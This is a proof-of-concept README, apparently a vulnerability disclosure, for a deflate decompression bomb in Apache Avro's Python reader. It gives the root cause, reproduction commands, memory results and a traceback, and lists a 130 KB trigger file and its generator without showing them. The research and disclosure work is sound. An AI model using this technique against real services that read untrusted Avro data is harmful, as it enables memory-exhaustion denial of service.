Apache Avro Python deflate decompression bomb PoC

This repository contains a minimal proof of concept for a resource-exhaustion issue in Apache Avro's official Python reader.

Affected:

  • avro==1.12.1 from PyPI
  • Apache Avro main at commit 840dc8139f4b3d1bfa8e8c8f1ac3be949b440634

Root cause:

  • avro.datafile.DataFileReader.__next__() calls _read_block_header().
  • _read_block_header() calls codec.decompress(self.raw_decoder).
  • avro.codecs.DeflateCodec.decompress() reads the compressed Avro block and calls zlib.decompress(data, -15) without any maximum decompressed-size or expansion-ratio limit.

The included avro-deflate-128m.avro is a valid deflate-coded Avro object container file. It is 130,634 bytes on disk and expands to a 134,217,728-byte bytes field during normal DataFileReader iteration.

Reproduction

python3 -m venv .venv
.venv/bin/pip install avro==1.12.1
.venv/bin/python verify_avro_deflate_bomb_poc.py \
  avro-deflate-control.avro \
  avro-deflate-128m.avro

Expected result on the test host:

control file_size=181 -> loaded, payload_len=1024, maxrss_after_kb around 18,000
bomb file_size=130634 -> loaded, payload_len=134217728, maxrss_after_kb around 280,000

With a 160 MiB address-space cap, the control loads while the bomb fails in the Avro block decompression path:

.venv/bin/python verify_avro_deflate_bomb_poc.py --limit-mb 160 \
  avro-deflate-control.avro \
  avro-deflate-128m.avro

Observed exception:

MemoryError: Unable to allocate output buffer.
  File ".../avro/datafile.py", line 404, in __next__
  File ".../avro/datafile.py", line 386, in _read_block_header
  File ".../avro/codecs.py", line 126, in decompress
    uncompressed = zlib.decompress(data, -15)

Files

  • avro-deflate-128m.avro - 130,634-byte trigger file, SHA256 a050bf7715a45d46f0abe327b94557e7d5f209cbdb549292de9e3fe5104df8f0
  • avro-deflate-control.avro - 181-byte control file, SHA256 fd1d3d5cc0722727329d536ee8ab20e4fc3da2629c8921ffde850e96056d7ae9
  • make_avro_deflate_bomb_poc.py - generator
  • verify_avro_deflate_bomb_poc.py - verifier

Notes

Apache Avro Java recently added decompression-size limits for the same class of codec bomb in AVRO-4247. This PoC demonstrates that the official Python Avro reader still lacks an equivalent limit in the latest PyPI release and in current Apache Avro main.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support